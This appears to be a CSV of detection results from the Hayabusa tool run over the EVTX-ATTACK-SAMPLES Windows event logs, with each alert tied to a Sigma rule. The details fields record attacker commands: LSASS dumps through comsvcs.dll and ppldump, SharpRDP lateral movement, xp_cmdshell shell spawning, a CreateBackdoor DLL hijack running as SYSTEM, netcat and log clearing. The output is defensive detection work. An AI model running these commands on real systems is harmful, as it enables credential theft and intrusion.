2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx
2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx
2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx
2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript  c:\ProgramData\memdump.vbs notepad.exe  :  Path: C:\Windows\System32\cscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx
2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx
2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: -  :  SID: S-1-5-21-3461203602-4096304019-2269080069-501  :  Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx
2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: -  :  SID: S-1-5-20  :  Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx
2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\sqlsvc  :  Parent Command: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation/win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx
2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,informational,Logoff,User: ANONYMOUS LOGON  :  LogonID: 0x1d12916,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx
2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,FileProtocolHandler ms-browser://  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: rundll32 url.dll,FileProtocolHandler ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe  :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,OpenURL ms-browser://  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: rundll32 url.dll,OpenURL ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe  :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /c start ms-browser://  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd.exe /c start ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe  :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: explorer ms-browser://  :  Path: C:\Windows\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding  :  Path: C:\Windows\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: SharpRDP.exe  computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password  :  Path: C:\ProgramData\USOShared\SharpRDP.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: Furutaka.exe  dummy2.sys  :  Path: C:\Users\Public\BYOV\TDL\Furutaka.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: ppldump.exe  -p lsass.exe -o a.png  :  Path: C:\Users\Public\BYOV\ZAM64\ppldump.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx
2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: usoclient  StartInteractiveScan  :  Path: C:\Windows\System32\UsoClient.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: nc.exe  127.0.0.1 1337  :  Path: C:\Users\Public\Tools\nc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
